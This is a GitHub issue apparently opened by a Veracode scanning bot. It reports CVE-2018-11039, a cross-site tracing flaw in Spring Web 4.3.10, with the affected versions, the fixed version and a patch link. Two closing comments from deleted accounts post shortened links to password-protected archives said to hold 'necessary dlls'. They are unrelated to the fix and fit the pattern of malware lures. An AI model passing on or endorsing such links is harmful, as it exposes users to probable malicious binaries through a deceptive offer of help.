CVE: 2018-11039 found in Spring Web - Version: 4.3.10.RELEASE [JAVA]

[github-actions[bot]]

Veracode Software Composition Analysis

Attribute	Details
Library	Spring Web
Description	Spring Web
Language	JAVA
Vulnerability	Cross-Site Tracing (XST)
Vulnerability description	spring-web is vulnerable to cross-site tracing (XST) attacks. The vulnerability exists as HiddenHttpMethodFilter allows web applications to change existing HTTP request method to any HTTP method, causing applications with existing cross-site scripting (XSS) vulnerability to be vulnerable to XST.
CVE	2018-11039
CVSS score	4.3
Vulnerability present in version/s	4.3.0.RELEASE-4.3.17.RELEASE
Found library version/s	4.3.10.RELEASE
Vulnerability fixed in version	4.3.18.RELEASE
Library latest version	6.2.0-RC1
Fix

Links:

• https://sca.analysiscenter.veracode.com/vulnerability-database/libraries/1104?version=4.3.10.RELEASE
• https://sca.analysiscenter.veracode.com/vulnerability-database/vulnerabilities/6806
• Patch: https://github.com/spring-projects/spring-framework/commit/323ccf99e575343f63d56e229c25c35c170b7ec1

[ghost]

maybe this will help

https://bit.ly/3zo8fAM Pass: changeme I put the necessary dlls in the archive

[ghost]

I think this will help you. https://bit.ly/4gABgKn Archive codepass: changeme I put the necessary dlls in the archive